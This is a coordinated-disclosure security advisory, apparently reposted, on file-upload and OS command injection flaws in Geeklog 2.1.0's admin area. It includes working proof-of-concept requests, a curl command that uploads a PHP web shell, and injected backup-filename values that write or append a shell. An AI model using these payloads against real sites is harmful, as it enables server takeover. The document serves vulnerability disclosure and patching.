Geeklog 2.1.0 Command Injection

2015.12.11
Credit: Tim Coen
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Geeklog 2.1.0 Fixed in: 2.1.1b3 Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156 Vendor Contact: geeklog-security@lists.geeklog.net Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3. 3. Upload of Files with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin". Proof of Concept POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Length: 761 Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773 Cookie: [cookies] -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="mode" add -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="currentpath" /var/www/geeklog-2.1.0/public_html/images/ -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="filepath" test.png -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="newfile"; filename="shell.php" Content-Type: image/png <?php passthru($_GET['x']) -----------------------------10717364298700964751730232773 Content-Disposition: form-data; name="upload" Upload -----------------------------10717364298700964751730232773-- As curl command: curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \ -b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \ --data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \ 'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php' 4. OS Command Injection CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When performing a database backup, various settings are passed unsanitized to exec, leading to code execution. To exploit this issue, an attacker needs a registered user that is in the group "Root". Proof of Concept 1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to: geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;" 2. Perform database backup here: http://localhost/geeklog-2.1.0/public_html/admin/database.php The injected commands will be executed. In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags: geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;" Code /admin/database.php function dobackup() { [...] if (!empty($_CONF['mysqldump_filename_mask'])) { $filename_mask = strftime($_CONF['mysqldump_filename_mask']); } [...] $backupfile = $_CONF['backup_path'] . $filename_mask; [...] $command .= " $_DB_name > \"$backupfile\""; [...] if ($canExec) { exec($command); 5. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: https://www.geeklog.net/filemgmt/visit.php/1156 Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/17/2015 Reminded Vendor of disclosure date 11/17/2015 Vendor points to beta version and announces release 11/24/2015 Informed Vendor of insufficient fix in beta 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

References:

https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top